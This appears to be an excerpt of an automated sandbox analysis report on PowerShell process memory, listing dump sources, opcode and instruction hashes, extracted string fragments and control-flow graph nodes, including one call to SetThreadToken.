                                                                                                                                                                            • Instruction Fuzzy Hash: DBE0C232740A140B83117A2EA91485FB7DBEFC8A71340483EE529C7300DE74EC0687D5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                            • Instruction ID: 46ab8de697d15325ce246e94a24fc4b64ca30592be5a3409c1fb6799c263d392
                                                                                                                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                            • Instruction Fuzzy Hash: CFE08631B00018978B089599D4504E9F7A9EBCC224F04857ED90AE7740DA72A91686E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 715f3382cab15b55a582563f2908382c8218a899ccfe67732719746a6d459e8f
                                                                                                                                                                            • Instruction ID: 6b5d731fd7ea925b5dd6ff62c823c9965cf98f8cecc65cd076b912da676d3eda
                                                                                                                                                                            • Opcode Fuzzy Hash: 715f3382cab15b55a582563f2908382c8218a899ccfe67732719746a6d459e8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6BE06D319493898FCB02DB7CE50A8AA7F71DB07224B0402AED5869B313D5701842CF81
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                            • Instruction ID: c515eac06b7216618b1899066797ebfc3a129f1d882459d1c706916c72891ce4
                                                                                                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 33D067B4D0420D9F8780EFADC94156EFBF4EB48204F6085AE8A19E7341F7329A129BD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9d2025db3ca7d7781c49a2c136fabcb86717d14e453b9fabfd8bdae28c7705d2
                                                                                                                                                                            • Instruction ID: 401f5003b2faf3cde8c5cd2d3001f75613e150e0477a0409b834d4642154fbc6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d2025db3ca7d7781c49a2c136fabcb86717d14e453b9fabfd8bdae28c7705d2
                                                                                                                                                                            • Instruction Fuzzy Hash: B6D01234A0420DCB8704EF64E54A46E7FB5E745315F00416ED90993342DA306881CFC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e5b6aad39fee2268d89404c6aa0f6fddad58449c12a0a440273c3988b67c1398
                                                                                                                                                                            • Instruction ID: a33aed3c4589d1b64c1747bc0893d96f29de408a6f787b2a614a68494bceddcc
                                                                                                                                                                            • Opcode Fuzzy Hash: e5b6aad39fee2268d89404c6aa0f6fddad58449c12a0a440273c3988b67c1398
                                                                                                                                                                            • Instruction Fuzzy Hash: 8ED0673190510DCBCB08ABA4F95E4BDBB34FA15316F40416ED91792592EA316A9ACAC1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 83f1d3a15634723fef65cb54612dcdd7b923dceadf323305e9e26de21b458e53
                                                                                                                                                                            • Instruction ID: 2ee652acaaa8a47950c979c60b81a508f51e8ed7fd732d721bdee14d9799e1bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 83f1d3a15634723fef65cb54612dcdd7b923dceadf323305e9e26de21b458e53
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D0A93200F3C65FC3071B76A810400BFBA6E4362034604DFE18D8A6A3CA2ED884CB02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e0fbdf4b9036a5eb5116f67fc68eb42aa920a1a28080d5ef538dbd0e931b1db6
                                                                                                                                                                            • Instruction ID: 39b8e26a547d5a37dd29b169d649f843894c14c41ca7443f0f763eeebf53184e
                                                                                                                                                                            • Opcode Fuzzy Hash: e0fbdf4b9036a5eb5116f67fc68eb42aa920a1a28080d5ef538dbd0e931b1db6
                                                                                                                                                                            • Instruction Fuzzy Hash: C0C04C1140B3D15ADF47863559D4513BF715E43A3131A4AD6D051CF467CC18C44DD711
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6cdaf0352e436156fb156629411aa5ef532384bc5d091cdf9b729976376ef812
                                                                                                                                                                            • Instruction ID: 47d286947a73f9f6e7abfd05d6804ea14df27b5f07350e06c28989e31941adab
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdaf0352e436156fb156629411aa5ef532384bc5d091cdf9b729976376ef812
                                                                                                                                                                            • Instruction Fuzzy Hash: 33B0923204570A8FC2096FB5E40881473A9BA4420938108A8E50E0A296CE76E881CE45
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2306644927
                                                                                                                                                                            • Opcode ID: 860c9b0dc5d5b650e30039375bf932e9b46948ff9e3e0598618f933cf03a76ff
                                                                                                                                                                            • Instruction ID: 309b6bab377c5a3658a0dc694dd384c558b9c13eed2e3dc4041f5118bc1f1303
                                                                                                                                                                            • Opcode Fuzzy Hash: 860c9b0dc5d5b650e30039375bf932e9b46948ff9e3e0598618f933cf03a76ff
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C619FB0A1020EDBDBADAE64C544BA9B7F1AB47301F54825AE8029B390C775DDC7CB61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3865595929
                                                                                                                                                                            • Opcode ID: f9bbf5a3a5078e3ed2dd0ff8f1ce65f8c6473ed2c6e51345305ab83e72e214b0
                                                                                                                                                                            • Instruction ID: c9271b6e732ce3b89ceeddf70e149bf1f0708c43581962ded4dd45060b3377fe
                                                                                                                                                                            • Opcode Fuzzy Hash: f9bbf5a3a5078e3ed2dd0ff8f1ce65f8c6473ed2c6e51345305ab83e72e214b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 01B148B17043459FCB55AB7A980066EBBE6AFC6A10F14816AD446CF352DE32CC86C761
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-4154621813
                                                                                                                                                                            • Opcode ID: 5ca61bb40982513acfe7feb971e58b23f11288ec9601be565eea93049ec570f2
                                                                                                                                                                            • Instruction ID: 9e7a561994730468d69ded69596662b51bdadde6e37eab7a345ae8ba181fe93f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ca61bb40982513acfe7feb971e58b23f11288ec9601be565eea93049ec570f2
                                                                                                                                                                            • Instruction Fuzzy Hash: F5514F303940588FC729AB7DD55493C3AD7AB8865431009EEE516CF7B5EE26EC828752
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-1375766648
                                                                                                                                                                            • Opcode ID: 26f8d540d266e437a44c3bb01f60a85f4af641f8530cb10b4eaafda75d01c144
                                                                                                                                                                            • Instruction ID: 24474f1b3a44f1b07150411a0889a460a7c2384755ba3deb6e6ddc5e33497143
                                                                                                                                                                            • Opcode Fuzzy Hash: 26f8d540d266e437a44c3bb01f60a85f4af641f8530cb10b4eaafda75d01c144
                                                                                                                                                                            • Instruction Fuzzy Hash: E7E1F1307401148FEB19AB7D951462E76D7AFC8B54B2449AEDB02CF3E4EE35EC428792
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$pipj$tP^q$tP^q
                                                                                                                                                                            • API String ID: 0-499639324
                                                                                                                                                                            • Opcode ID: a71f6a593a393d5230baafd39077845b6ec05b60d074ab71f478c6ee3d9cf940
                                                                                                                                                                            • Instruction ID: 147a421a8df9e094ab156f7d4197d9d9cf33bd0e106c674b327ce1e16e9730fc
                                                                                                                                                                            • Opcode Fuzzy Hash: a71f6a593a393d5230baafd39077845b6ec05b60d074ab71f478c6ee3d9cf940
                                                                                                                                                                            • Instruction Fuzzy Hash: 42D149B1B0420A8FCB69AB789404666BBF6AFC6310F18857FC556CB355DB31C887C7A1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-3272787073
                                                                                                                                                                            • Opcode ID: b6d9b01b0806688677416c29b667c2da1b2ad5a4b1a3f4bfc6d8de5fb09c825a
                                                                                                                                                                            • Instruction ID: c927829a65f5389b5bc5064fbedc62460d139db9cdd9f012cd71e00e03ef45cf
                                                                                                                                                                            • Opcode Fuzzy Hash: b6d9b01b0806688677416c29b667c2da1b2ad5a4b1a3f4bfc6d8de5fb09c825a
                                                                                                                                                                            • Instruction Fuzzy Hash: 625158F17043069FDB646A7A980076EBBA6AFC2B10F24857AD447CB351DF35C886C791
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: f5fc15aa3ea625ac264429b0f6e30c44eb5bc224cec24bd9ded1e4e790e97016
                                                                                                                                                                            • Instruction ID: 76dcf0739185dce51122492550091d4c4c4d2357722f801b0f20475e04375922
                                                                                                                                                                            • Opcode Fuzzy Hash: f5fc15aa3ea625ac264429b0f6e30c44eb5bc224cec24bd9ded1e4e790e97016
                                                                                                                                                                            • Instruction Fuzzy Hash: BAB19274E0120A9FDB54DFA9D980A9DFBF2FF88304F10862AD519AB315DB34A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2313346183.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_48c0000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                            • API String ID: 0-3297199963
                                                                                                                                                                            • Opcode ID: f0ff4e20107cbe924737e7c15aa94adfe4196ec55238ab151fde60a993805db8
                                                                                                                                                                            • Instruction ID: a3dd3c2b1d68a4b1ad40eb02a10e178215764a7142262b89fb192d58a3aab323
                                                                                                                                                                            • Opcode Fuzzy Hash: f0ff4e20107cbe924737e7c15aa94adfe4196ec55238ab151fde60a993805db8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9CB17374E0120A9FDB54DFA9D980A9DFBF2FF88304F108629D519AB315DB34A945CF90
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2125118731
                                                                                                                                                                            • Opcode ID: fcec980b3e5d81b9a068e364505737ad581e70906da740f6356c4bce9f149319
                                                                                                                                                                            • Instruction ID: b574c9bdd650449fdb3d89c25fb0c6609d08fbf641c2f6b14ffc4f9f3fac81d2
                                                                                                                                                                            • Opcode Fuzzy Hash: fcec980b3e5d81b9a068e364505737ad581e70906da740f6356c4bce9f149319
                                                                                                                                                                            • Instruction Fuzzy Hash: EB216BF17103169BDBB8763A9800B27A7DB6BD0711F24852BE507CF386DD75C8518361
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2324755369.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_7680000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                            • API String ID: 0-2049395529
                                                                                                                                                                            • Opcode ID: faa40095720892e078b9b74ec5a804ceba60f15cc30a15d96d1173d0c05154de
                                                                                                                                                                            • Instruction ID: 3fd915e50a5fc39ff552ef609bf133db08a46914309cbe48419b9a3f771db726
                                                                                                                                                                            • Opcode Fuzzy Hash: faa40095720892e078b9b74ec5a804ceba60f15cc30a15d96d1173d0c05154de
                                                                                                                                                                            • Instruction Fuzzy Hash: 0901DB617493875FC76E163898105666FB25FC391071949ABC041CF796CD554C4E83A3

                                                                                                                                                                            Execution Graph

Execution Coverage: 4.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph
• Node 23338: 8d47600
• Node 23339: 8d47604 SetThreadToken
• Node 23341: 8d47671
• Edges: 23338->23339, 23339->23341

                                                                                                                                                                            Control-flow Graph

control_flow_graph
• Node 727: 517b569-517b572
• Node 728: 517b574-517b57b
• Node 729: 517b57c-517b591
• Node 730: 517b596-517b8d1 call 517aa7c
• Node 731: 517b593
• Node 792: 517b8d6-517b8dd
• Edges: 727->728, 727->729, 728->729, 729->730, 729->731, 730->792, 731->730
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 34166e7473c5238e9b6cb157332b6e94fa5f14140ce0585e8983c5d78959624a
                                                                                                                                                                            • Instruction ID: ddb7de9b980b1ef2e068f96a505ae85bf38b24c8c47cd913665bd44072479124
                                                                                                                                                                            • Opcode Fuzzy Hash: 34166e7473c5238e9b6cb157332b6e94fa5f14140ce0585e8983c5d78959624a
                                                                                                                                                                            • Instruction Fuzzy Hash: DF918371B007189BDB19EFB4D4545AEBBB2EFC4604B408D2DD10AAB344DF785D0A8BD6

                                                                                                                                                                            Control-flow Graph

control_flow_graph
• Node 793: 517b578-517b591
• Node 795: 517b596-517b8d1 call 517aa7c
• Node 796: 517b593
• Node 857: 517b8d6-517b8dd
• Edges: 793->795, 793->796, 795->857, 796->795
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ac6c4860e6b55a0e0cc01c14e6f5e03b922254e6f4341ab31415c04b9e8e8d24
                                                                                                                                                                            • Instruction ID: 43e536e16a37a9d00943b0b420a3be00649e21b063f6bfa3865555fee3ceb314
                                                                                                                                                                            • Opcode Fuzzy Hash: ac6c4860e6b55a0e0cc01c14e6f5e03b922254e6f4341ab31415c04b9e8e8d24
                                                                                                                                                                            • Instruction Fuzzy Hash: 95917071B006189BDB19EFB4D8545AEB7B2EF84604B40892DD10AAB344DF786D0A8BD6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'^q$4'^q$pipj$pipj$pipj$pipj$pipj$|,rj
                                                                                                                                                                            • API String ID: 0-1806894991
                                                                                                                                                                            • Opcode ID: b6ea117c82ab546e772826b4b8679f8150f4298cb76116fbbb75dda93b6663f6
                                                                                                                                                                            • Instruction ID: 2d7ba80751e8da86c6ab7b22153acc7cb00a65622345b8061b3cebd210c200bf
                                                                                                                                                                            • Opcode Fuzzy Hash: b6ea117c82ab546e772826b4b8679f8150f4298cb76116fbbb75dda93b6663f6
                                                                                                                                                                            • Instruction Fuzzy Hash: 992237F1B002059FFB249B6994486EABBE2FF85310F0480FAD605CB251DB39DD85C7A2

Control-flow Graph: entry block 7b63ce8-7b63d0d, blocks span 7b63ce8-7b643ea, no API calls recorded (node/edge layout omitted)
Strings
Memory Dump Source
• Source File: 00000015.00000002.2468530973.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_7b60000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: 24ee357022c0c98601514023d893bc943fd0b6ae4a3ec905069ef5f0b42cb7e1
• Instruction ID: 3e2571ef9d0545e23eaf3852dd64389671510d45a4aa1fcecfe1f3a270aee7b2
• Opcode Fuzzy Hash: 24ee357022c0c98601514023d893bc943fd0b6ae4a3ec905069ef5f0b42cb7e1
• Instruction Fuzzy Hash: 131237F1B043558FDB159B68980876ABFE2EF81210F2480BAD645CF256DE3ACD85C7A1

Control-flow Graph: entry block 8d475f9-8d475fa; block 8d47643-8d4766f calls SetThreadToken (node/edge layout omitted)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2473147230.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8d40000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 9fae3203bbb4cedd15616dd14e9dc2c9a75355924681e61a0bbb9fda2684c3ea
• Instruction ID: b0c7647f5bff6a2462f4da955d75b1f7cb53e2a0003837558e0fbb4506496eda
• Opcode Fuzzy Hash: 9fae3203bbb4cedd15616dd14e9dc2c9a75355924681e61a0bbb9fda2684c3ea
• Instruction Fuzzy Hash: 211164B19002888FCB10CF9EC488A9EFFF5EB49360F208859D158A7310C774A945CFA4

Control-flow Graph: entry block 8d47600-8d4766f calls SetThreadToken (node/edge layout omitted)
APIs
Memory Dump Source
• Source File: 00000015.00000002.2473147230.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_8d40000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: d2b80ae624b19eb8e4e3cf6c64fc0a3890a7019f5ea0be7244e60086f22b0085
• Instruction ID: 1493cf4ca2aa1004522be3968ee3f4196549b1ee9e5a98b973038da6256ad1af
• Opcode Fuzzy Hash: d2b80ae624b19eb8e4e3cf6c64fc0a3890a7019f5ea0be7244e60086f22b0085
• Instruction Fuzzy Hash: A91122B19002488FCB10DF9AC884B9EFFF8EB48324F24841AD558A7310C774A944CFA4

Control-flow Graph: entry block 5176e28-5176e47; block 5176e52 calls 5176d64 and 5176d7f (node/edge layout omitted)
Strings
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: 4788667e0ed4405db4f731aedd8e1650eef99e8c22a1db96709a7785e0782a4a
• Instruction ID: 853b8f3e1c840965a921ce19cc160b4b012a4e55152339f17dd45b4f249c6af4
• Opcode Fuzzy Hash: 4788667e0ed4405db4f731aedd8e1650eef99e8c22a1db96709a7785e0782a4a
• Instruction Fuzzy Hash: A0516A31B046098FCB14DFA8C564AEEBBF6EF89355F1440A9E906EB750DB389D01CB61

Control-flow Graph: entry block 517b080-517b089 calls 517a780 (node/edge layout omitted)
Strings
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID: (&^q
• API String ID: 0-2067289071
• Opcode ID: 76be0df8afe00ff5f375520d713436da26a20058e70ace436f837c2394867964
• Instruction ID: 00a17a2796f3609b5255e9d06b933e94a22e918ef5b88dacf548a6518b5dd00b
• Opcode Fuzzy Hash: 76be0df8afe00ff5f375520d713436da26a20058e70ace436f837c2394867964
• Instruction Fuzzy Hash: 7E21BC71A082588FCB14DFAED44469EBFF5EB88320F24886ED008E7340DB759905CBA5

Control-flow Graph: entry block 517cc80-517cd10; block 517cd26-517cd80 calls 517b080; block 517ce15 calls 517a774 (node/edge layout omitted)
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 54a8d7a2c072452ee6f2ec7fca150b9e2b467a5ba8edb290bf8d59aa604b60b6
• Instruction ID: 095ed90df2fbc9647e029d1ae300aa6a3983f29316c30a2f595cbf4bc034e415
• Opcode Fuzzy Hash: 54a8d7a2c072452ee6f2ec7fca150b9e2b467a5ba8edb290bf8d59aa604b60b6
• Instruction Fuzzy Hash: B261F775E002489FCB14DFA9D5846DDBBF1FF88314F14816AE809AB354DB349D85CB90
Memory Dump Source
• Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c70f16805777e1ee80dd8e47385e76096e0295dba2624a5f472cf9d8f3d60249
• Instruction ID: 9f65df604bd843c41f2e607882a3a8d7684310cfb7e593863dd89ab63bfdf629
• Opcode Fuzzy Hash: c70f16805777e1ee80dd8e47385e76096e0295dba2624a5f472cf9d8f3d60249
• Instruction Fuzzy Hash: 8B51F375E002489FCB14CFA9D584A9DBFF6FF88314F14806AE819AB354DB349D45CBA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000015.00000002.2445175834.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_21_2_5170000_powershell.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e603361119cc37a65de87f6a3444462ead14e9b7cbe53ce29f1f98fc7e6b570e
                                                                                                                                                                            • Instruction ID: 914cba3e82ed06b092bb67924eee9db5b25e4b0962f8b8e8909515871dde1e09
                                                                                                                                                                            • Opcode Fuzzy Hash: e603361119cc37a65de87f6a3444462ead14e9b7cbe53ce29f1f98fc7e6b570e
